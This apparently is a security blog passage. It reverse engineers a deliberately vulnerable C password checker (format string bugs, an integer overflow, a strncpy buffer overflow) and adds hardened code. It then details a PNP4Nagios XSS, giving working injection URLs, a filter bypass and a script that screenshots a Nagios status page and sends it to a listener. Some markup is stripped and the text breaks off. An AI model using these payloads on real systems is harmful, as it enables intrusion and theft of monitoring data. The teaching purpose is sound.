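/* What checkpass sees right after its prologue, read relative to EBP. */
typedef struct {
    uint32_t ret_addr_at_ebp4;   /* value at [ebp+4] */
    uint32_t arg_at_ebp8;        /* value at [ebp+8] */
    uint32_t saved_ebp_at_ebp;   /* value at [ebp]   */
    uint32_t local_space;        /* ebp - esp        */
} Frame;

Frame call_checkpass(Cpu *c, uint32_t arg)
{
    Frame f;
    push(c, arg);                          /* main stores the argument at [esp]; modelled as a push */
    call(c, 0x080486a2u, 0x0804865cu);     /* call 0x80486a2 <checkpass>; returns to main+80 */
    prologue(c, 8u);                       /* the article's example frame: sub esp, 0x8 */
    f.ret_addr_at_ebp4 = rd(c, c->ebp + 4u);
    f.arg_at_ebp8      = rd(c, c->ebp + 8u);
    f.saved_ebp_at_ebp = rd(c, c->ebp);
    f.local_space      = c->ebp - c->esp;
    return f;
}

int main(void)
{
    Cpu c;
    cpu_init(&c);
    uint32_t caller_ebp = c.ebp;
    Frame f = call_checkpass(&c, 0x80487f0u);   /* constructed argument value */
    printf("[ebp+8] arg       = 0x%08x\n", f.arg_at_ebp8);
    printf("[ebp+4] ret addr  = 0x%08x\n", f.ret_addr_at_ebp4);
    printf("[ebp]   saved ebp = 0x%08x (caller's ebp 0x%08x)\n", f.saved_ebp_at_ebp, caller_ebp);
    printf("ebp-esp = %u bytes of locals\n", f.local_space);
    leave(&c);
    ret(&c);
    printf("after leave/ret: eip=0x%08x ebp=0x%08x\n", c.eip, c.ebp);
    return 0;
}
```

<p>Reading the model out gives the layout the diagrams show: the argument at [ebp+8], the return address at [ebp+4], the caller's EBP at [ebp] and the locals below that. After <code>leave</code> and <code>ret</code> only the argument is left on the stack, which under cdecl the caller removes.</p>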
<h2>Juicy Bits Continued</h2>
<p>Now that we understand how the stack works we can have a look at that second call to <code>printf</code>. The first argument to <code>printf</code> is always the format string, so when looking for a format string vulnerability we are trying to figure out whether we can control the first argument.</p>
<p>The relevant lines that set up and call <code>printf</code> are:</p>
<pre><code>1     0x08048627 &lt;+27&gt;:    mov    eax,DWORD PTR [ebp+0xc]
2     0x0804862a &lt;+30&gt;:    mov    eax,DWORD PTR [eax]
3     0x0804862c &lt;+32&gt;:    mov    DWORD PTR [esp],eax
4     0x0804862f &lt;+35&gt;:    call   0x8048470 &lt;printf@plt&gt;
</code></pre>
<p>These 4 lines of code are actually line 18 in the source of the application. Line 1 moves the second argument (<code>ebp+0xc</code>) into EAX (the second argument is always +C or +12 because EBP points to the old EBP, +4 points to the return address and +8 points to the first argument).</p>
<p>In C the second argument to the main function is a list of pointers to the actual application arguments.</p>
<p>Because this argument is an array of pointers, line 2 moves the first pointer in this array into EAX (this normally points to the path of the application itself).</p>
<p>This pointer is moved to the address pointed to by ESP (the top of the stack) and finally <code>printf</code> is called. This shows that <code>printf</code> is given only 1 argument, and that argument is the application path.</p>
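<p>As an added example (not the article's code), here is the bounded form of the two calls identified so far: the <code>printf(argv[0])</code> / <code>printf(argv[1])</code> pattern, where whatever the user typed becomes the format string, and the <code>strncpy(p, a, strlen(a)+1)</code> in <code>checkpass</code>, whose length comes from the source string rather than from the 512-byte destination. <code>PASS</code> and the buffer size are the article's; the helper names, the result enum and the constructed oversized input are our own.</p>

```c
#include <stdio.h>
#include <string.h>

/* Added example, not code from the article: the bounded form of the two calls
 * the article has flagged.  PASS and the 512-byte buffer mirror the article's
 * app; the helper names and the test inputs are our own. */

#define PASS  "topsecretpassword"
#define BUFSZ 512

enum pass_result { PASS_OK = 0, PASS_WRONG = 1, PASS_TOOLONG = 2 };

/* Copy src into dst only if it fits, NUL terminator included.
 * Returns 0 on success and -1, leaving dst untouched, if it would not fit.
 * strncpy(p, a, strlen(a)+1) sizes the copy by the source and never consults
 * the size of p; this helper is bounded by the destination instead. */
int bounded_copy(char *dst, size_t dstsz, const char *src)
{
    size_t n = strlen(src);
    if (n >= dstsz)              /* need n bytes plus one for the terminator */
        return -1;
    memcpy(dst, src, n + 1);
    return 0;
}

/* checkpass() with the copy bounded by sizeof p.  Over-long input is
 * reported as PASS_TOOLONG instead of being written past the array. */
enum pass_result checkpass_bounded(const char *a)
{
    char p[BUFSZ];
    if (bounded_copy(p, sizeof p, a) != 0)
        return PASS_TOOLONG;
    return strcmp(p, PASS) == 0 ? PASS_OK : PASS_WRONG;
}

/* The article's main() does printf(argv[0]) and printf(argv[1]).  Passing the
 * user's text as a "%s" argument of a fixed format prints the same characters
 * but never interprets them.  Formats into out so the result can be checked;
 * returns what snprintf returns. */
int echo_arg(char *out, size_t outsz, const char *label, const char *arg)
{
    return snprintf(out, outsz, "%s%s\n", label, arg);
}

int main(int argc, char **argv)
{
    char big[BUFSZ * 2];   /* constructed oversize input: 1023 'A's, twice the buffer */
    char line[128];

    memset(big, 'A', sizeof big - 1);
    big[sizeof big - 1] = '\0';

    printf("oversize input -> %d (PASS_TOOLONG, nothing copied)\n", checkpass_bounded(big));
    printf("\"test\"         -> %d (PASS_WRONG)\n", checkpass_bounded("test"));

    /* Even a '%' in the argument is printed literally. */
    echo_arg(line, sizeof line, "Wrong password: ", argc > 1 ? argv[1] : "%x%x");
    fputs(line, stdout);
    return 0;
}
```

<p>The two checks worth keeping in mind when reviewing similar code: a copy is only safe when its length argument is derived from the destination's size, and user data should reach the <code>printf</code> family only as an argument, never as the format.</p>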
<p>We can check this using <code>gdb</code>, but first there was a conditional statement which determined if this code got executed:</p>
<pre><code>1     0x08048615 &lt;+9&gt;:     cmp    DWORD PTR [ebp+0x8],0x1
2     0x08048619 &lt;+13&gt;:    jg     0x804864c &lt;main+64&gt;
</code></pre>
<p>This is the <code>if</code> statement on line 16 of the source code.</p>
<p>Line 1 compares the first argument, <code>ebp+0x8</code>, with 1, and line 2 jumps to <code>0x804864c</code> if the first argument is greater than 1. As you can see, the assembly condition is the opposite of what is in the source code; this is often the case.</p>
<p>In C the first argument to the main function is the number of arguments given to the application on the command line, so to enter the section of code we want to analyse we just need to give the application 1 argument (the name of the application is considered the first argument, so there is always at least 1).</p>
<h3>Integer Overflow</h3>
<p>The <code>jg</code> instruction means that the numbers being compared are signed (it would be <code>ja</code> if they were unsigned), and because there is no bounds checking done on <code>ebp+0x8</code>, it is vulnerable to an integer overflow.</p>
<p>I wanted to demonstrate this as soon as I realised, but because it is an integer I would need to send at least 2147483647 arguments, and I couldn't do this on my test machine because there just isn't enough RAM.</p>
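<p>The check at <code>main+9</code>/<code>main+13</code>, as an added example that is not the article's code: the same <code>argc &gt; 1</code> comparison evaluated on the <code>int</code> the compiler actually uses, on a count narrowed to a <code>signed char</code> (the variant the article switches to next), and with a range check before the narrowing, plus the <code>jg</code>-versus-<code>ja</code> distinction on one 32-bit bit pattern. The function names are ours, and the wrap-around results assume gcc or clang, where converting an out-of-range value to <code>signed char</code> wraps modulo 256 (C leaves it implementation-defined).</p>

```c
#include <limits.h>
#include <stdint.h>
#include <stdio.h>

/* Added example, not code from the article: the argc check from main,
 * evaluated three ways, and a signed-versus-unsigned compare.  Names are ours;
 * wrap-around on narrowing assumes gcc/clang behaviour. */

/* The compiled check: take the usage branch unless argc > 1 (signed compare, jg). */
int usage_branch_int(int argc)
{
    return !(argc > 1);
}

/* The count after narrowing to an 8-bit signed value.  Out-of-range conversion
 * is implementation-defined in C; gcc and clang wrap modulo 256, so 130 reads
 * as -126 and 257 reads as 1. */
int narrowed_count(int argc)
{
    return (signed char)argc;
}

/* The same check made on the narrowed count. */
int usage_branch_char(int argc)
{
    signed char c = (signed char)argc;
    return !(c > 1);
}

/* Hardened narrowing: refuse any count the small type cannot represent, so the
 * comparison is always made on the value the caller actually supplied. */
int narrow_checked(int argc, signed char *out)
{
    if (argc < 0 || argc > SCHAR_MAX)
        return -1;          /* an error, distinct from "too few arguments" */
    *out = (signed char)argc;
    return 0;
}

/* jg vs ja: one 32-bit pattern compared against b as signed (jg) and as
 * unsigned (ja).  0x80000000 is INT_MIN when signed, 2147483648 when unsigned. */
int greater_signed(uint32_t a, uint32_t b)   { return (int32_t)a > (int32_t)b; }
int greater_unsigned(uint32_t a, uint32_t b) { return a > b; }

int main(void)
{
    signed char c;
    printf("130 args: int check -> %d, char check -> %d (count reads as %d)\n",
           usage_branch_int(130), usage_branch_char(130), narrowed_count(130));
    printf("257 args: int check -> %d, char check -> %d (count reads as %d)\n",
           usage_branch_int(257), usage_branch_char(257), narrowed_count(257));
    printf("narrow_checked(257) -> %d\n", narrow_checked(257, &c));
    printf("0x80000000 > 1: jg says %d, ja says %d\n",
           greater_signed(0x80000000u, 1u), greater_unsigned(0x80000000u, 1u));
    return 0;
}
```

<p>With 130 or 257 arguments the narrowed check takes the usage branch even though more than one argument was supplied, which is the behaviour a bounds check before the narrowing prevents; the last line shows why the article reads <code>jg</code> as a signed compare.</p>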
```c
#include <stdio.h>
#include <string.h>
#include <stdlib.h>

#define PASS "topsecretpassword"

#define SFILE "secret.txt"

int checkpass(char *p);
void printfile();

int main(char argc, char **argv)
{
    int r;

    if (argc < 2) {
        printf("Usage: ");
        printf(argv[0]);
        printf(" <password>\n");
        exit(1);
    }
    r = checkpass(argv[1]);
    if (r != 0) {
        printf("Wrong password: ");
        printf(argv[1]);
        printf("\n");
        exit(1);
    }
    printfile();
}

int checkpass(char *a)
{
    char p[512];
    int r;
    strncpy(p, a, strlen(a)+1);
    r = strcmp(p, PASS);
    return r;
}

void printfile()
{
    FILE *f;
    int c;
    f = fopen(SFILE, "r");
    if (f) {
        while ((c = getc(f)) != EOF)
            putchar(c);
        fclose(f);
    } else {
        printf("Error opening file: " SFILE "\n");
        exit(1);
    }
}
```

Here is the quick demonstration:

```
[user@host]:/home/testuser# gcc -z execstack -fno-stack-protector -o app-intof app-intof.c
[user@host]:/home/testuser# ./app-intof $(python -c 'print "A "*126')
Wrong password: A
[user@host]:/home/testuser# ./app-intof $(python -c 'print "A "*127')
Usage: ./app-intof <password>
```

What is happening here is that the argument `argc` is being interpreted as a signed char, and the maximum value for this type of variable is 127:

```
[user@host]:/home/testuser# grep SCHAR_MAX /usr/include/limits.h
# define SCHAR_MAX 127
# define CHAR_MAX SCHAR_MAX
```

As the application is the first argument, we can have another 126 arguments before the variable overflows and becomes -128, which is obviously smaller than 2.

## Back To The Juicy Bits

So now we know how to get to the code we want to analyse, which is:
```
0x08048627 <+27>: mov eax,DWORD PTR [ebp+0xc]
0x0804862a <+30>: mov eax,DWORD PTR [eax]
0x0804862c <+32>: mov DWORD PTR [esp],eax
0x0804862f <+35>: call 0x8048470 <printf@plt>
```

Let's set a breakpoint on line 1 here (or `0x08048627`) and run the application without any arguments.

```
(gdb) break *0x08048627
Breakpoint 1 at 0x8048627
(gdb) r
Starting program: /home/testuser/app

Breakpoint 1, 0x08048627 in main ()
(gdb) disassemble $eip,+10
Dump of assembler code from 0x8048627 to 0x8048631:
=> 0x08048627 <main+27>: mov eax,DWORD PTR [ebp+0xc]
   0x0804862a <main+30>: mov eax,DWORD PTR [eax]
   0x0804862c <main+32>: mov DWORD PTR [esp],eax
   0x0804862f <main+35>: call 0x8048470 <printf@plt>
End of assembler dump.
(gdb) x/xw $ebp+0xc
0xbfc674f4: 0xbfc67594
(gdb) x/xw 0xbfc67594
0xbfc67594: 0xbfc6795f
(gdb) x/s 0xbfc6795f
0xbfc6795f: "/home/testuser/app"
```

This shows that our assumptions were correct and that there is likely a format string vulnerability here, which we can exploit by changing the name of the application (or creating a symlink, as in [part 2](/x86-32-linux/2014/05/20/plain-format-string-vulnerability/)).

We also have a very similar set of `printf` calls towards the end of the application:

```
0x08048667 <+91>: mov DWORD PTR [esp],0x8048804
0x0804866e <+98>: call 0x8048470 <printf@plt>
0x08048673 <+103>: mov eax,DWORD PTR [ebp+0xc]
0x08048676 <+106>: add eax,0x4
0x08048679 <+109>: mov eax,DWORD PTR [eax]
0x0804867b <+111>: mov DWORD PTR [esp],eax
0x0804867e <+114>: call 0x8048470 <printf@plt>
```

We are interested in the second `printf` here, but to figure out how to get to it we need to have a look at the memory at `0x8048804`, which is printed just before.

```
(gdb) x/s 0x8048804
0x8048804: "Wrong password: "
```

So we get to this section of code when we give a wrong password.
The call to the `printf` in question is the same as the previous one except that 4 is added to EAX before the pointer is followed. This suggests the second argument is being printed (the previous `printf` also supports our theory), but let's check.

Let's set a breakpoint and examine the memory again:

```
(gdb) info breakpoints
Num Type Disp Enb Address What
1 breakpoint keep y 0x08048627 <main+27>
(gdb) delete 1
(gdb) break *0x0804867b
Breakpoint 2 at 0x804867b
(gdb) r ABC
Starting program: /home/testuser/app ABC

Breakpoint 2, 0x0804867b in main ()
(gdb) x/s $eax
0xbffff96d: "ABC"
```

This is the second format string vulnerability.

## Buffer Overflow

So far we have found an integer overflow and 2 format string vulnerabilities.

Next we should look over the `checkpass` function, which is called on line 23 of the disassembly above. Here are the relevant instructions related to the call to `checkpass`:

```
0x0804864c <+64>: mov eax,DWORD PTR [ebp+0xc]
0x0804864f <+67>: add eax,0x4
0x08048652 <+70>: mov eax,DWORD PTR [eax]
0x08048654 <+72>: mov DWORD PTR [esp],eax
0x08048657 <+75>: call 0x80486a2 <checkpass>
```

We've already seen a set of instructions that were exactly the same as this (the second call to `printf`), so this function takes 1 argument: the second argument to the application.

Here is the disassembly of `checkpass`:

```
(gdb) disassemble checkpass
Dump of assembler code for function checkpass:
   0x080486a2 <+0>: push ebp
   0x080486a3 <+1>: mov ebp,esp
   0x080486a5 <+3>: sub esp,0x228
   0x080486ab <+9>: mov eax,DWORD PTR [ebp+0x8]
   0x080486ae <+12>: mov DWORD PTR [esp],eax
   0x080486b1 <+15>: call 0x80484d0 <strlen@plt>
   0x080486b6 <+20>: add eax,0x1
   0x080486b9 <+23>: mov DWORD PTR [esp+0x8],eax
   0x080486bd <+27>: mov eax,DWORD PTR [ebp+0x8]
   0x080486c0 <+30>: mov DWORD PTR [esp+0x4],eax
   0x080486c4 <+34>: lea eax,[ebp-0x20c]
   0x080486ca <+40>: mov DWORD PTR [esp],eax
   0x080486cd <+43>: call 0x8048510 <strncpy@plt>
   0x080486d2 <+48>: mov DWORD PTR [esp+0x4],0x8048815
   0x080486da <+56>: lea eax,[ebp-0x20c]
   0x080486e0 <+62>: mov DWORD PTR [esp],eax
   0x080486e3 <+65>: call 0x8048460 <strcmp@plt>
   0x080486e8 <+70>: mov DWORD PTR [ebp-0xc],eax
   0x080486eb <+73>: mov eax,DWORD PTR [ebp-0xc]
   0x080486ee <+76>: leave
   0x080486ef <+77>: ret
End of assembler dump.
```

In the prologue, 0x228 bytes (or 552 bytes) are reserved for local variables and function call arguments.

The interesting call here is the call to `strncpy`, but we need to examine the call to `strlen` first because it looks like its output is the third argument to `strncpy`.

The call to `strlen`:

```
0x080486ab <+9>: mov eax,DWORD PTR [ebp+0x8]
0x080486ae <+12>: mov DWORD PTR [esp],eax
0x080486b1 <+15>: call 0x80484d0 <strlen@plt>
```

It's clear that the first argument to `checkpass` is being used as the argument to `strlen`. Return values are normally passed using the EAX register.

Here is the call to `strncpy`:

```
0x080486b6 <+20>: add eax,0x1
0x080486b9 <+23>: mov DWORD PTR [esp+0x8],eax
0x080486bd <+27>: mov eax,DWORD PTR [ebp+0x8]
0x080486c0 <+30>: mov DWORD PTR [esp+0x4],eax
0x080486c4 <+34>: lea eax,[ebp-0x20c]
0x080486ca <+40>: mov DWORD PTR [esp],eax
0x080486cd <+43>: call 0x8048510 <strncpy@plt>
```

You can see that 1 is added to the return value of `strlen` and it is put on the stack as the third argument to `strncpy` (lines 1 and 2).

The pointer to the function argument is then put on the stack as the second argument (lines 3 and 4).

Lastly, the address of the local variable is put on the stack as the first argument (lines 5 and 6).

Here we can see that the local variable is 0x20c bytes (524 bytes) away from EBP, meaning that we'll need to write 528 bytes until we overwrite EIP using an overflow here; the extra 4 bytes are for the old EBP saved during the prologue.

Looking at the prototype for `strncpy` (using `man strncpy`), we can see that the first argument is the destination, the second the source and the third the maximum number of characters to copy:

```
char *strncpy(char *dest, const char *src, size_t n);
```

Knowing all of this, it's easy to see that there is in fact a buffer overflow here, because the developer has used the length of the input buffer to bound the copy function. We can even see how many bytes we have until we overwrite EIP.

## Conclusion

While it's technically possible to just fuzz all of the application inputs, the more complex the application gets, the more infeasible it becomes.

This is also true for reverse engineering every section of an application, so it's important that you know how to focus on the important parts of the application.

Ultimately reverse engineering is much more powerful than fuzzing, but both should be used in combination to increase efficiency.

Happy Hacking :-)
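As an added example (not code from the tutorial), here is the `checkpass` analysed above beside a version whose copy is bounded by the destination buffer, together with the "Wrong password" line routed through a fixed `"%s"` format instead of `printf(argv[1])`. The names `checkpass_vuln`, `checkpass_fixed`, `overflow_bytes`, `wrong_password_is_literal` and `check_constructed` are mine, and the 'A'-filled inputs are constructed for the demonstration.

```c
#include <stdio.h>
#include <string.h>

#define PASS "topsecretpassword"   /* same constant as the tutorial's listing */
#define PBUF 512                    /* size of p[] in checkpass() */

/* The tutorial's checkpass(): the copy length is strlen(a)+1, i.e. it is
 * bounded by the SOURCE, so an argument of 512 bytes or more runs off the
 * end of p[] towards the saved EBP and return address (ebp-0x20c .. ebp+4).
 * Kept only for comparison; never call it with untrusted input. */
int checkpass_vuln(const char *a)
{
    char p[PBUF];
    int r;
    strncpy(p, a, strlen(a) + 1);
    r = strcmp(p, PASS);
    return r;
}

/* Bounded version: the limit comes from the DESTINATION. memchr() looks
 * for the terminator inside the first PBUF bytes only; if it is not there
 * the argument cannot fit (and cannot be the password), so it is rejected
 * with -1 before anything is copied. Returns 0 on match, 1 on mismatch. */
int checkpass_fixed(const char *a)
{
    char p[PBUF];
    const char *end = memchr(a, '\0', PBUF);
    if (end == NULL)
        return -1;
    memcpy(p, a, (size_t)(end - a) + 1);   /* at most PBUF bytes */
    return strcmp(p, PASS) != 0;
}

/* How many bytes strncpy(p, a, strlen(a)+1) writes past p[PBUF] for an
 * argument of arglen characters: 0 up to 511 characters, arglen+1-512
 * beyond that. */
size_t overflow_bytes(size_t arglen)
{
    return arglen + 1 > PBUF ? arglen + 1 - PBUF : 0;
}

/* The tutorial's main() calls printf(argv[1]), so '%' sequences in the
 * argument are interpreted as directives. Routing the argument through a
 * fixed "%s" format keeps it literal. Returns 1 if arg appears verbatim in
 * the formatted line, 0 otherwise (or if the line did not fit). */
int wrong_password_is_literal(const char *arg)
{
    char line[1024];
    int n = snprintf(line, sizeof line, "Wrong password: %s\n", arg);
    if (n < 0 || (size_t)n >= sizeof line)
        return 0;
    return strstr(line, arg) != NULL;
}

/* Constructed input for the checks below: `len` copies of 'A', like the
 * tutorial's python -c 'print "A"*N' arguments. Returns checkpass_fixed()'s
 * result, or -2 if len does not fit the scratch buffer. */
int check_constructed(size_t len)
{
    char buf[1024];
    if (len >= sizeof buf)
        return -2;
    memset(buf, 'A', len);
    buf[len] = '\0';
    return checkpass_fixed(buf);
}

int main(void)
{
    printf("fixed, correct password: %d\n", checkpass_fixed(PASS));
    printf("fixed, 511 x 'A': %d\n", check_constructed(511));
    printf("fixed, 512 x 'A': %d (rejected, nothing copied)\n",
           check_constructed(512));
    printf("bytes written past p[] for a 600-char argument: %zu\n",
           overflow_bytes(600));
    printf("\"%%x%%x\" printed literally through \"%%s\": %d\n",
           wrong_password_is_literal("%x%x"));
    return 0;
}
```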

XSS in PNP4Nagios

4 July 2014 at 17:55
By: 0xe7
pYesterday a href="http://seclists.org/oss-sec/2014/q3/26" target="_blank"this/a was sent to the a href="http://oss-security.openwall.org/wiki/" target="_blank"OSS-Security mailing list/a. For some reason the subject caught my eye (strongCVE request: pnp4nagios - Two URL Cross-Site Scripting Vulnerabilities/strong)./p pNeedless to say, I didn't bother reading it; the investigation started immediately. This is the result of that investigation./p pI started by downloading and installing Nagios and PNP4Nagios onto a freshly installed Debian Wheezy VM./p pI'm not going to go into the actual installation, it's easy enough and there is plenty of documentation that explains how to do it. All I will say is that you will need Nagios 3 (I couldn't get PNP4Nagios working with Nagios 4) and that I installed the latest version of PNP4Nagios (which was 0.6.22 at the time of writing)./p pYou might have to leave Nagios a few minutes to collect some data. I didn't set up any services; Nagios comes with some default services which should be fine for our purposes./p pAfter this, and once you have removed code/usr/local/pnp4nagios/share/install.php/code from the server, visit codehttp://[server]/pnp4nagios//code, put in the username and password, and you should see this:/p pimg src="/assets/images/web-hacking/pnp4nagios-start.png" width="750"/p h2Testing The App/h2 pFirst it makes sense to test the one input we have (codehost/code) for the most basic types of XSS:/p pimg src="/assets/images/web-hacking/pnp4nagios-host-first.png" width="750"/p pimg src="/assets/images/web-hacking/pnp4nagios-host-second.png" width="750"/p pimg src="/assets/images/web-hacking/pnp4nagios-host-third.png" width="750"/p pAs you can see, there is some filtering going on here, although it does confuse me as to why HTML is allowed to be injected at all./p pThe filtering going on here looks like it's replacing at least '/' (strongforward slash/strong) and ' ' (strongspace/strong) with '_' (strongunderscore/strong)./p pAnd looking at the source, the output is encoded:/p pimg src="/assets/images/web-hacking/pnp4nagios-host-third-source.png" width="750"/p pAfter clicking on a service and a timerange on the right, a few more inputs appear:/p pimg src="/assets/images/web-hacking/pnp4nagios-more.png" width="750"/p pFrom the previous tests it seems that the error page has reasonably good filtering, so let's try to avoid that and come back to it later if we have to./p pWe have two new inputs to test (codesrv/code and codeview/code); I test each of these by appending codelt;foobargt;/code to them./p pTesting codesrv/code this way brings me back to the error page, but testing codeview/code the page loads fine:/p pimg src="/assets/images/web-hacking/pnp4nagios-view-first.png" width="750"/p pLooking at the source and searching for codefoobar/code, we can see that it is stored in a hidden input tag and there doesn't seem to be any filtering:/p pimg src="/assets/images/web-hacking/pnp4nagios-view-first-source.png" width="750"/p h2Exploiting The App/h2 pLet's try the normal tests, while prepending code"gt;/code to break out of the input tag, and look at the source:/p pimg src="/assets/images/web-hacking/pnp4nagios-view-script-source.png" width="750"/p pimg src="/assets/images/web-hacking/pnp4nagios-view-img-source.png" width="750"/p pWe're very nearly there; it looks like the codeonerror/code attribute is being removed (I tried a few others as well and they were all removed), so let's try and fool the filter using the classic code/**//code method. This works because a filter that looks for whitespace followed by codeon...=/code never sees the handler, while the HTML tokenizer treats the stray code//code as a self-closing marker and code**/code as an attribute name and still parses codeonerror/code as an event handler:/p pimg src="/assets/images/web-hacking/pnp4nagios-xss.png" width="750"/p pSuccess!/p pThe full URL I typed here was codehttp://dev/pnp4nagios/graph?host=localhostamp;srv=_HOST_amp;view=3%22%3E%3Cimg%20src=F%20/**/onerror=%22alert%281%29%22%3E/code/p pIn fact, what this application seems to be doing is adding a hidden field for any argument that you give it, without sufficient filtering on any of them. I sent this URL (codehttp://dev/pnp4nagios/graph?host=localhostamp;srv=_HOST_amp;monkey=foobar/code) and this was the resulting source:/p pimg src="/assets/images/web-hacking/pnp4nagios-monkey.png" width="750"/p h2Finding Another XSS/h2 pLet's also have a look at the zoom function on these graphs. Clicking the zoom button (the little magnifying glass icon) you get this window:/p pimg src="/assets/images/web-hacking/pnp4nagios-zoom.png" width="750"/p pI copied the full URL and pasted it into my normal browser window so that I could play with the URL./p pLooking at the source, the first thing I notice is that some of these inputs are vulnerable to the same XSS inside the codeimg/code tag near the bottom. It seems to be subjected to the same filtering, so I assumed that it is the same vulnerability (as the edit at the end of this post shows, it wasn't). The second thing I notice is inside the codescript/code tags, inside a function called coderedirect/code:/p pimg src="/assets/images/web-hacking/pnp4nagios-zoom-js.png" width="750"/p pAs you can see, it appears that one of our inputs (codesource/code) is put inside these script tags. Let's test to see what type of filtering it is subjected to:/p pimg src="/assets/images/web-hacking/pnp4nagios-zoom-js-test.png" width="750"/p pApparently there is no filtering here!/p pNow all we have to do is figure out the correct prefix and suffix to allow us to run our JavaScript and still maintain valid syntax./p pWe are inside a function that we need to break out of if we want our code to run on load; we do this by prepending code;};/code to our payload./p pNext we need to start a new function to ensure the syntax is correct; we do this by appending codefunction r(){/code, so our payload ends up like this: code;};alert(1);function r(){/code. The leading code0/code keeps the statement the page builds around our input well-formed, and the dangling codefunction r(){/code is closed by the brace that originally closed coderedirect/code:/p pimg src="/assets/images/web-hacking/pnp4nagios-xss2.png" width="750"/p pNice! We have our second XSS! 
:-)/p pHere is the full URL I used: codehttp://dev/pnp4nagios/zoom?host=localhostamp;srv=Current_Loadamp;view=0amp;source=0;};alert%281%29;function%20r%28%29{amp;end=1404503451amp;start=1404468087amp;graph_width=500amp;graph_height=100/code/p h2Going Beyond Alert(1)/h2 pI decided to demonstrate what can be done with this vulnerability./p pI will use a javascript library called a href="http://html2canvas.hertzen.com/" target="_blank"html2canvas/a to create a screenshot of a Nagios page to get as much information as possible about the network that is being monitored by Nagios./p pThe page we will target is codehttp://dev/nagios/cgi-bin/status.cgi?host=all/code. This page lists all of the hosts and services, on a real monitoring server we could get some juicy information on this page./p pHere is the javascript that I wrote for this purpose:/p table class="highlighttable"trtd class="linenos"div class="linenodiv"prespan class="code-line"span class="normal" 1/span/span span class="code-line"span class="normal" 2/span/span span class="code-line"span class="normal" 3/span/span span class="code-line"span class="normal" 4/span/span span class="code-line"span class="normal" 5/span/span span class="code-line"span class="normal" 6/span/span span class="code-line"span class="normal" 7/span/span span class="code-line"span class="normal" 8/span/span span class="code-line"span class="normal" 9/span/span span class="code-line"span class="normal"10/span/pre/div/tdtd class="code"div class="highlight"prespan class="code-line"span/spancodespan class="nx"d/spanspan class="o"=/spanspan class="nb"document/spanspan class="p";/spanspan class="kd"function/span span class="nx"r/spanspan class="p"(){/spanspan class="nx"n/spanspan class="o"=/spanspan class="nx"d/spanspan class="p"./spanspan class="nx"body/spanspan class="p"./spanspan class="nx"childNodes/spanspan class="p";/spanspan class="k"for/spanspan class="p"(/spanspan class="nx"i/spanspan class="o"=/spanspan class="mf"0/spanspan 
class="p";/spanspan class="nx"i/spanspan class="o"lt;/spanspan class="nx"n/spanspan class="p"./spanspan class="nx"length/spanspan class="p";/spanspan class="nx"i/spanspan class="o"++/spanspan class="p"){/spanspan class="nx"n/spanspan class="p"[/spanspan class="nx"i/spanspan class="p"]./spanspan class="nx"remove/spanspan class="p"()/span/span span class="code-line"span class="p";};};/spanspan class="k"for/spanspan class="p"(/spanspan class="nx"i/spanspan class="o"=/spanspan class="mf"0/spanspan class="p";/spanspan class="nx"i/spanspan class="o"lt;/spanspan class="mf"3/spanspan class="p";/spanspan class="nx"i/spanspan class="o"++/spanspan class="p"){/spanspan class="nx"r/spanspan class="p"();};/spanspan class="nb"window/spanspan class="p"./spanspan class="nx"stop/spanspan class="p"();/spanspan class="nx"f/spanspan class="o"=/spanspan class="nx"d/spanspan class="p"./spanspan class="nx"createElement/spanspan class="p"(/spanspan class="s1"#39;iframe#39;/spanspan class="p");/span/span span class="code-line"span class="nx"f/spanspan class="p"./spanspan class="nx"src/spanspan class="o"=/spanspan class="s1"#39;/nagios/cgi-bin/status.cgi?host=all#39;/spanspan class="p";/spanspan class="nx"f/spanspan class="p"./spanspan class="nx"style/spanspan class="o"=/spanspan class="s1"#39;border: 0; position:fixed;/span/span span class="code-line"span class="s1" top:0; left:0; right:0;bottom:0; width:100%; height:100%#39;/spanspan class="p";/spanspan class="nx"f/spanspan class="p"./spanspan class="nx"scrolling/spanspan class="o"=/spanspan class="s1"#39;no#39;/spanspan class="p";/span/span span class="code-line"span class="nx"f/spanspan class="p"./spanspan class="nx"id/spanspan class="o"=/spanspan class="s1"#39;e#39;/spanspan class="p";/spanspan class="nx"f/spanspan class="p"./spanspan class="nx"onload/spanspan class="o"=/spanspan class="kd"function/span span class="p"(){/spanspan class="nx"html2canvas/spanspan class="p"(/spanspan class="nx"d/spanspan class="p"./spanspan 
class="nx"getElementsByTagName/spanspan class="p"(/spanspan class="s1"#39;iframe#39;/spanspan class="p")[/spanspan class="mf"0/spanspan class="p"]/span/span span class="code-line"span class="p"./spanspan class="nx"contentDocument/spanspan class="p"./spanspan class="nx"documentElement/spanspan class="p",{/spanspan class="nx"onrendered/spanspan class="o":/span span class="kd"function/spanspan class="p"(/spanspan class="nx"canvas/spanspan class="p")/span/span span class="code-line"span class="p"{/spanspan class="nx"q/spanspan class="o"=/spanspan class="ow"new/span span class="nx"XMLHttpRequest/spanspan class="p"();/spanspan class="nx"q/spanspan class="p"./spanspan class="nx"open/spanspan class="p"(/spanspan class="s1"#39;GET#39;/spanspan class="p",/spanspan class="s1"#39;http://localhost:9000/?image=#39;/span/span span class="code-line"span class="o"+/spanspan class="nx"canvas/spanspan class="p"./spanspan class="nx"toDataURL/spanspan class="p"(),/spanspan class="kc"true/spanspan class="p");/spanspan class="nx"q/spanspan class="p"./spanspan class="nx"send/spanspan class="p"(/spanspan class="kc"null/spanspan class="p");}});};/spanspan class="nx"s/spanspan class="o"=/spanspan class="nx"d/spanspan class="p"./spanspan class="nx"createElement/spanspan class="p"(/spanspan class="s1"#39;script#39;/spanspan class="p");/span/span span class="code-line"span class="nx"s/spanspan class="p"./spanspan class="nx"src/spanspan class="o"=/spanspan class="s1"#39;http://html2canvas.hertzen.com/build/html2canvas.js#39;/spanspan class="p";/span/span span class="code-line"span class="nx"d/spanspan class="p"./spanspan class="nx"body/spanspan class="p"./spanspan class="nx"appendChild/spanspan class="p"(/spanspan class="nx"s/spanspan class="p");/spanspan class="nx"d/spanspan class="p"./spanspan class="nx"body/spanspan class="p"./spanspan class="nx"appendChild/spanspan class="p"(/spanspan class="nx"f/spanspan class="p");/span/span span class="code-line"/code/pre/div /td/tr/table pI originally 
